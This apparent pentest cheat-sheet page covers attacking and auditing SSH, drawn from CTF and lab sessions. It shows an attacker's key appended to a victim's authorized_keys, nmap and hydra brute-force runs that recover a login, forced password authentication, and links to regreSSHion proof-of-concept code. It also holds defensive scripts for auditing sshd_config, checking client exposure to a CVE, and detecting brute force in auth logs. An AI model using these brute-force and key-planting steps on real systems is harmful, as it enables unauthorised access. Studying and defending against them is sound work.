# SSH (22)

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Service

```
service ssh start
# Verification
netstat -antp | grep sshd
```

## Keys

### SSH Connection

```
chmod 600 id_rsa
ssh -i id_rsa user@host -p port
```

### Generate Keys

```
0xSs0rZ@pico-2018-shell:~$ ssh-keygen -t rsa                                                                   
Generating public/private rsa key pair.                                                                        
Enter file in which to save the key (/home/0xSs0rZ/.ssh/id_rsa):                                               
Enter passphrase (empty for no passphrase):                                                                    
Enter same passphrase again:                                                                                   
Your identification has been saved in /home/0xSs0rZ/.ssh/id_rsa.                                               
Your public key has been saved in /home/0xSs0rZ/.ssh/id_rsa.pub.                                               
The key fingerprint is:                                                                                        
SHA256:YPsf7PTkrxc7owo8NkyxQVnfL3ZOS3xf+YDmJNVcMR0 0xSs0rZ@pico-2018-shell                                     
The key's randomart image is:                                                                                  
+---[RSA 2048]----+                                                                                            
|        .o.    E=|                                                                                            
|       ..  . + .o|                                                                                            
|      o o   o +  |                                                                                            
|     . o + . ....|                                                                                            
|      . S . + ++*|                                                                                            
|       = . = .o**|                                                                                            
|        O + o  ++|                                                                                            
|       . B =  =  |                                                                                            
|          +.==.o |                                                                                            
+----[SHA256]-----+                                                                                            
0xSs0rZ@pico-2018-shell:~$ cd /home/0xSs0rZ/.ssh                                                               
0xSs0rZ@pico-2018-shell:~/.ssh$                                                                                
0xSs0rZ@pico-2018-shell:~/.ssh$  ls                                                                            
id_rsa  id_rsa.pub                                                                                             
0xSs0rZ@pico-2018-shell:~/.ssh$ cp id_rsa.pub ~/.ssh/authorized_keys                                           
0xSs0rZ@pico-2018-shell:~/.ssh$ ssh -i id_rsa 0xSs0rZ@localhost                                                
The authenticity of host 'localhost (127.0.0.1)' can't be established.                                         
ECDSA key fingerprint is SHA256:1/2OUR2IggrhZwLysFuJlUZ169yf1BFVeTIDW8Fo5XU.                                   
Are you sure you want to continue connecting (yes/no)? yes                                                     
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.                                     
picoCTF{quelquechose}  
```

### Authorized-Keys

```
# Attacker
root@Host-001:~/Bureau/htb# cat traceback.pub
ssh-rsa ...SNIP... root@Host-001
root@Host-001:~/Bureau/htb#

# Victim
webadmin@traceback:/home/webadmin/.ssh$ echo "ssh-rsa ...SNIP... root@Host-001" >> authorized_keys
webadmin@traceback:/home/webadmin/.ssh$

# Connection
root@Host-001:~/Bureau/htb# ssh -i traceback webadmin@10.10.10.181
```

### Pseudo-Terminal

```
ssh -t bandit18@localhost /bin/sh
```

## SSL Encryption

```
echo pass | openssl s_client -quiet -connect localhost:30001
```

## Generate key

```shell-session
ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/home/parrot/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase):
Enter same passphrase again:

Your identification has been saved in /home/parrot/.ssh/id_rsa
Your public key has been saved in /home/parrot/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:...SNIP... parrot@parrot
The key's randomart image is:
+---[RSA 3072]----+
|            o..  |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|       + +oo+o   |
+----[SHA256]-----+
```

## SSH with a key id_rsa

```
[Apr 06, 2024 - 07:50:27 (EDT)] exegol-CPTS /workspace # chmod 600 id_rsa              
[Apr 06, 2024 - 07:52:03 (EDT)] exegol-CPTS /workspace # ssh -i id_rsa ceil@10.129.42.195
```

## Metasploit

{% embed url="<https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html>" %}

## Dangerous settings

| **Setting**                  | **Description**                                                                          |
| ---------------------------- | ---------------------------------------------------------------------------------------- |
| `PasswordAuthentication yes` | Allows password-based authentication.                                                    |
| `PermitEmptyPasswords yes`   | Allows the use of empty passwords.                                                       |
| `PermitRootLogin yes`        | Allows login as the root user.                                                           |
| `Protocol 1`                 | Enables the obsolete SSH protocol version 1, which has known cryptographic weaknesses.   |
| `X11Forwarding yes`          | Allows X11 forwarding for GUI applications.                                              |
| `AllowTcpForwarding yes`     | Allows forwarding of TCP ports.                                                          |
| `PermitTunnel`               | Allows tun device tunnelling through the SSH connection.                                 |
| `DebianBanner yes`           | Appends the distribution-specific suffix to the version banner, disclosing the OS release. |
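The settings in the table can be checked mechanically against a host's `sshd_config`. The script below is an added example written for this page, not part of the original or of OpenSSH itself. It follows the parsing rules sshd applies that matter here: keywords are case-insensitive, both `Keyword value` and `Keyword=value` forms are accepted, the first occurrence of a keyword wins, and everything after the first `Match` block is conditional and is therefore ignored. The sample configuration is constructed; the only defaults it assumes are the two OpenSSH defaults named in the comments.

```python
"""Audit an sshd_config text for the dangerous settings listed above."""
import re

# Keyword -> values (lower-cased) that match a row of the table.
DANGEROUS = {
    "PasswordAuthentication": {"yes"},
    "PermitEmptyPasswords": {"yes"},
    "PermitRootLogin": {"yes"},
    "Protocol": {"1", "1,2", "2,1"},
    "X11Forwarding": {"yes"},
    "AllowTcpForwarding": {"yes", "all", "local", "remote"},
    "PermitTunnel": {"yes", "point-to-point", "ethernet"},
    "DebianBanner": {"yes"},
}

# Keywords whose OpenSSH default is "yes": leaving them unset is the same as
# setting them explicitly, so the audit reports them too.
DEFAULT_YES = {"PasswordAuthentication", "AllowTcpForwarding"}

# Constructed sample (not a real host's configuration).
SAMPLE_SSHD_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin yes
# The next line is ignored by sshd: the first occurrence wins.
PermitRootLogin no
PasswordAuthentication=yes
PermitEmptyPasswords no
X11Forwarding yes
PermitTunnel point-to-point
Match User backup
    AllowTcpForwarding yes
"""


def parse_sshd_config(text):
    """Return {lower-cased keyword: value} for the global section only.

    Comment lines are skipped, the first occurrence of a keyword wins, and
    parsing stops at the first Match block (its settings are conditional).
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Accept "Keyword value" as well as "Keyword=value".
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def audit_sshd_config(text):
    """Return (keyword, effective value, reason) for every dangerous setting."""
    settings = parse_sshd_config(text)
    findings = []
    for keyword, bad_values in DANGEROUS.items():
        value = settings.get(keyword.lower())
        if value is None:
            if keyword in DEFAULT_YES:
                findings.append((keyword, "yes", "not set; OpenSSH default is yes"))
        elif value.lower().replace(" ", "") in bad_values:
            findings.append((keyword, value, "explicitly set"))
    return findings


if __name__ == "__main__":
    for keyword, value, reason in audit_sshd_config(SAMPLE_SSHD_CONFIG):
        print(f"{keyword:24} {value:16} ({reason})")
```

Run against a live host with `sudo sshd -T` piped into the parser instead of the raw file: `sshd -T` prints the fully resolved effective configuration, so the first-occurrence and `Match` handling above becomes unnecessary and the defaults are spelled out explicitly.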

## CVE-2025-26465

The OpenSSH client, from version 6.8p1 through 9.9p1 (inclusive), contains a logic error that makes it vulnerable to an active MitM attack when the `VerifyHostKeyDNS` option is enabled.

{% embed url="<https://github.com/rxerium/CVE-2025-26465>" %}

```
nuclei -u yourHost.com -t template.yaml
```
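The two conditions stated above (client version in the affected range and `VerifyHostKeyDNS` enabled) can be checked on a workstation without a network probe. The script below is an added example written for this page, not part of the original or of the linked repository. It takes the banner that `ssh -V` prints and the text of `~/.ssh/config` or `/etc/ssh/ssh_config`; both sample values are constructed. The config check applies the documented ssh_config rule that the first obtained value wins and reports the value that applies to hosts not covered by a more specific `Host`/`Match` block. Treating `ask` as enabled follows the advisory's wording that either `yes` or `ask` exposes the client, and the fixed release is assumed to be 9.9p2 (the first version after the range given above).

```python
"""Client-side exposure check for CVE-2025-26465 (VerifyHostKeyDNS)."""
import re

AFFECTED_LOW = (6, 8, 1)   # 6.8p1, from the advisory range above
AFFECTED_HIGH = (9, 9, 1)  # 9.9p1 inclusive

VERSION_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)(?:p(\d+))?")

# Constructed samples (not taken from a real machine).
SAMPLE_BANNER = "OpenSSH_9.6p1 Ubuntu-3ubuntu13.5, OpenSSL 3.0.13 30 Jan 2024"
SAMPLE_CONFIG = """\
# constructed ~/.ssh/config
Host bastion
    VerifyHostKeyDNS no
Host *
    VerifyHostKeyDNS yes
    StrictHostKeyChecking ask
"""


def parse_openssh_version(banner):
    """Return (major, minor, portable_patch) from an `ssh -V` banner, or None.

    A version without a 'p' suffix is an OpenBSD-native release of the same
    code; it is treated as p1 so the range comparison still applies.
    """
    m = VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch) if patch else 1)


def is_affected_version(banner):
    """True when the banner's version falls inside 6.8p1 .. 9.9p1."""
    v = parse_openssh_version(banner)
    return v is not None and AFFECTED_LOW <= v <= AFFECTED_HIGH


def verify_host_key_dns(config_text):
    """Effective VerifyHostKeyDNS for hosts matched only by `Host *` or by no
    block at all. First obtained value wins; OpenSSH's default is "no".
    """
    in_scope = True  # lines before any Host/Match block apply everywhere
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key in ("host", "match"):
            # Only a bare `Host *` block applies to every destination.
            in_scope = key == "host" and value.split() == ["*"]
            continue
        if in_scope and key == "verifyhostkeydns":
            return value.lower()
    return "no"


def client_exposed(banner, config_text):
    """Both advisory conditions hold: affected version and option enabled."""
    return is_affected_version(banner) and verify_host_key_dns(config_text) in ("yes", "ask")


if __name__ == "__main__":
    print("version affected:", is_affected_version(SAMPLE_BANNER))
    print("VerifyHostKeyDNS:", verify_host_key_dns(SAMPLE_CONFIG))
    print("exposed:", client_exposed(SAMPLE_BANNER, SAMPLE_CONFIG))
```

On a real machine, feed `ssh -V 2>&1` into `is_affected_version` and the contents of both client config files into `verify_host_key_dns`; the mitigation when `client_exposed` is true is to set `VerifyHostKeyDNS no` until the client is upgraded.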

## CVE-2024-6387 - regreSSHion

Remote code execution (RCE) in the OpenSSH server.

{% embed url="<https://github.com/anhvutuan/CVE-2024-6387-poc-1>" %}

{% embed url="<https://github.com/xaitax/CVE-2024-6387_Check>" %}

{% embed url="<https://github.com/asterictnl-lvdw/CVE-2024-6387>" %}

{% embed url="<https://github.com/YassDEV221608/CVE-2024-6387_PoC>" %}

## SSH Audit

```shell-session
$ git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
$ ./ssh-audit.py 10.129.14.132
```

## SSHamble

```
$ ./sshamble scan -o results.jsonl 192.168.0.0/24
$ ./sshamble analyze -o results-directory results.jsonl
```

{% embed url="<https://github.com/runZeroInc/sshamble>" %}

## Change Authentication Method

```shell-session
$ ssh -v cry0l1t3@10.129.14.132

OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f  31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config 
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
```

For potential brute-force attacks, we can specify the authentication method with the SSH client option `PreferredAuthentications`.

```shell-session
$ ssh -v cry0l1t3@10.129.14.132 -o PreferredAuthentications=password

OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f  31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Next authentication method: password

cry0l1t3@10.129.14.132's password:
```

## Bruteforce

{% content-ref url="../brute-force/ssh-bruteforce" %}
[ssh-bruteforce](https://0xss0rz.gitbook.io/0xss0rz/pentest/brute-force/ssh-bruteforce)
{% endcontent-ref %}

### Nmap

```
[Apr 06, 2024 - 10:09:33 (EDT)] exegol-CPTS /workspace # nmap 10.129.202.20 -sV -p22 --script ssh-brute
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-06 10:09 EDT
NSE: [ssh-brute] Trying username/password pair: root:root
NSE: [ssh-brute] Trying username/password pair: admin:admin
NSE: [ssh-brute] Trying username/password pair: administrator:administrator
NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
NSE: [ssh-brute] Trying username/password pair: guest:guest
NSE: [ssh-brute] Trying username/password pair: user:user
NSE: [ssh-brute] Trying username/password pair: web:web
NSE: [ssh-brute] Trying username/password pair: test:test
NSE: [ssh-brute] Trying username/password pair: root:
NSE: [ssh-brute] Trying username/password pair: admin:
NSE: [ssh-brute] Trying username/password pair: administrator:
NSE: [ssh-brute] Trying username/password pair: webadmin:
```

### Hydra - See [Brute force - SSH](https://0xss0rz.gitbook.io/0xss0rz/pentest/brute-force/ssh-bruteforce)

```shell-session
$ hydra -L user.list -P password.list ssh://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://10.129.42.197:22/
[22][ssh] host: 10.129.42.197   login: user   password: password
1 of 1 target successfully completed, 1 valid password found
```
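On the target side, the nmap and hydra runs above leave a distinctive trail in sshd's auth log: a burst of `Failed password` lines from one source, followed (in the hydra case) by an `Accepted password` from the same source. The detector below is an added example written for this page, not part of the original or of either tool. It parses the syslog-style lines sshd writes to `/var/log/auth.log` on Debian/Ubuntu, keeps a sliding window of failures per source address, and raises a second, higher-severity alert when a flagged source subsequently authenticates. The log lines and addresses (RFC 5737 documentation ranges) are constructed; the year is assumed because syslog timestamps carry none.

```python
"""Detect SSH password brute-forcing and a follow-on login in auth.log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<event>Failed password|Accepted password|Accepted publickey|Invalid user) "
    r"(?:for )?(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

LOG_YEAR = 2024  # syslog lines carry no year; assumed for the constructed sample

# Constructed sample log (documentation addresses, not a real capture).
SAMPLE_AUTH_LOG = """\
Apr  6 10:09:33 bastion sshd[2101]: Invalid user admin from 198.51.100.7 port 51234
Apr  6 10:09:33 bastion sshd[2101]: Failed password for invalid user admin from 198.51.100.7 port 51234 ssh2
Apr  6 10:09:34 bastion sshd[2103]: Failed password for root from 198.51.100.7 port 51236 ssh2
Apr  6 10:09:35 bastion sshd[2105]: Failed password for invalid user webadmin from 198.51.100.7 port 51238 ssh2
Apr  6 10:09:36 bastion sshd[2107]: Failed password for invalid user test from 198.51.100.7 port 51240 ssh2
Apr  6 10:09:37 bastion sshd[2109]: Failed password for invalid user guest from 198.51.100.7 port 51242 ssh2
Apr  6 10:09:39 bastion sshd[2111]: Accepted password for user from 198.51.100.7 port 51244 ssh2
Apr  6 10:12:00 bastion sshd[2200]: Failed password for bob from 203.0.113.5 port 40010 ssh2
Apr  6 10:12:30 bastion sshd[2202]: Failed password for bob from 203.0.113.5 port 40012 ssh2
Apr  6 10:15:00 bastion sshd[2300]: Accepted publickey for alice from 192.0.2.10 port 40000 ssh2: ED25519 SHA256:constructed
"""


def parse_line(line):
    """Return (timestamp, event, user, source_ip) or None for unrelated lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=LOG_YEAR)
    return ts, m["event"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return alerts: one per source that reaches `threshold` failed passwords
    inside `window_seconds`, plus one for any later successful login from it.

    Only "Failed password" lines are counted: sshd also logs "Invalid user X"
    before "Failed password for invalid user X", so counting both would double
    every guess against a non-existent account.
    """
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e[0])  # logs may be interleaved out of order
    recent = defaultdict(deque)      # source ip -> failure timestamps in window
    flagged = set()
    alerts = []
    for ts, event, user, ip in events:
        if event == "Failed password":
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({
                    "type": "brute_force", "source": ip, "failures": len(q),
                    "window_start": q[0].isoformat(), "window_end": ts.isoformat(),
                })
        elif event.startswith("Accepted") and ip in flagged:
            alerts.append({
                "type": "success_after_brute_force", "source": ip, "user": user,
                "method": event.split()[1], "time": ts.isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

The `success_after_brute_force` alert is the one worth paging on: it is exactly the `[22][ssh] host: ... login: user password: password` result from hydra seen from the defender's side. Tune `threshold` and `window_seconds` to the `-t` task count an attacker is realistically limited to; the hydra warning above notes that many sshd configurations cap parallel attempts, which stretches a spray out in time.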

## SSH on Windows

Binaries:

{% embed url="<https://github.com/PowerShell/Win32-OpenSSH>" %}

Install SSH on Windows:

{% embed url="<https://winscp.net/eng/docs/guide_windows_openssh_server>" %}

## Execute command - Windows

{% embed url="<https://lolbas-project.github.io/lolbas/Binaries/Ssh/>" %}

## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**Nmap Network Scanning**](https://www.amazon.fr/dp/0979958717?tag=0xss0rz-21)\
  The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals.
* [**The Art of Network Penetration Testing**](https://www.amazon.fr/dp/1617296821)\
  A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.
* [**Network Basics for Hackers**](https://www.amazon.fr/dp/B0BS3GZ1R9)\
  The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
